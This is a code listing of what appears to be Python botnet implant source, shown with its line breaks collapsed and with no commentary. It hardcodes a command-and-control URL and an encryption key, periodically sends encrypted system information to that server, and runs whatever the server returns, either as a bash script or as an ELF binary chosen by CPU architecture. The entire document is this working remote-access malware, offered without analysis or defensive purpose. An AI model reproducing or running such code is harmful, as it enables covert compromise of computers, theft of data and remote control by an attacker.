1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74
| bot_id = 823701 server_url = 'https://einstiensinc.org/results/aat/694986b8e74a' encryption_key = 'Ywo992mchjuuwns@' user_agent = 'Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108'
key = xor_string_with_key(encryption_key, bot_id) aes_key = hashlib.sha256(str(encryption_key).encode()).digest()[:(16)] first_run = 1 while (1): if first_run == (0): time.sleep((600) * random.uniform(77, 123) / (100)) first_run = 0 encrypted_info = get_system_info(aes_key, key) try: response = requests.post( server_url, headers={ 'User-Agent': '{}'.format(user_agent), 'Cookie': 'id={0}'.format(bot_id + (9999)), 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' }, data=encrypted_info, verify=(0) ) if response.status_code != (200) or response.headers['Content-Type'] != 'application/octet-stream' or response.content == None: continue else: decrypted_content = decrypt_data(response.content, aes_key, key) except RequestException as e: continue child_pid = os.fork() if child_pid != (0): continue if decrypted_content.startswith(b'#!'): subprocess.run(decrypted_content.decode('utf-8'), shell=(1), executable='/bin/bash') else: machine_types = { **dict.fromkeys(['autodetect', 'libc'], -((1)), **dict.fromkeys(['386', (3)], (356)), **dict.fromkeys(['amd64', (62)], (319)), **dict.fromkeys(['arm', (40)], (385)), **dict.fromkeys(['arm64', 'riscv64', (183)], (279)), **dict.fromkeys(['mips', (8)], (4354)), **dict.fromkeys(['mips64', 'mips64le', (8)], (5314)), **dict.fromkeys(['ppc', 'ppc64', (20)], (360)), **dict.fromkeys(['s390x', (22)], (350)), **dict.fromkeys(['sparc64', (2), (18), (43)], (348))) } elf_machine_type = parse_elf_header(decrypted_content[:(20)]) if elf_machine_type !='libc': syscall_number = machine_types.get(elf_machine_type) else: syscall_number = None loader_code = ' ' loader_code = prepare_loader_code(loader_code, syscall_number) loader_code = add_decompression_code(loader_code, decrypted_content) loader_code = add_write_code(loader_code, syscall_number) loader_code = build_execution_command(loader_code, server_url.split('/')[-(1)]) exec(loader_code) sys.exit((0))
|